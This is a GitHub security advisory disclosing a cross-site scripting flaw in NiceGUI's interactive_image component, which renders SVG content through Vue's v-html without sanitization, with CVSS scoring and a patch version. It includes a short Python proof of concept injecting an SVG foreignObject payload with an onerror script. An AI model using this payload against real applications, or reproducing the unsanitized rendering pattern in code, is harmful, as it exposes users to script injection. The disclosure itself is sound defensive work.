Skip to content

Stored/Reflected XSS in ui.interactive_image via unsanitized SVG content

Moderate
falkoschindler published GHSA-2m4f-cg75-76w2 Dec 8, 2025

Package

pip nicegui (pip)

Affected versions

<= 3.3.1

Patched versions

3.4.0

Description

Summary

A Cross-Site Scripting (XSS) vulnerability exists in the ui.interactive_image component of NiceGUI (v3.3.1 and earlier). The component renders SVG content using Vue's v-html directive without any sanitization. This allows attackers to inject malicious HTML or JavaScript via the SVG <foreignObject> tag.

Details

The vulnerability is located in nicegui/elements/interactive_image.js.
The component uses the following code to render content:

<g v-html="content"></g>

Vue's v-html directive renders raw HTML strings into the DOM. If an application allows user-controlled input to be passed to the content property of an interactive image, an attacker can embed a tag containing malicious scripts, bypassing typical image restrictions.

PoC

from nicegui import ui

@ui.page('/')
def main():
    ui.label('NiceGUI SVG XSS PoC')
    
    # Standard image loading
    img = ui.interactive_image('[https://picsum.photos/640/360](https://picsum.photos/640/360)')
    
    # Payload: Embeds raw HTML execution inside SVG
    # This executes immediately when the image component is rendered
    img.content = (
        '<foreignObject>'
        '<body xmlns="[http://www.w3.org/1999/xhtml](http://www.w3.org/1999/xhtml)">'
        '<img src=x onerror=alert("XSS-SVG")>'
        '</body>'
        '</foreignObject>'
    )

ui.run()

Impact

  • Type: Reflected / Stored XSS (depending on data source)

  • Severity: Moderate

  • Impact: Attackers can inject malicious scripts that execute whenever the image component is rendered or updated. This is particularly dangerous for dashboards or multi-user applications displaying user-generated content or annotations.

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE ID

CVE-2025-66470

Weaknesses

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Learn more on MITRE.

Credits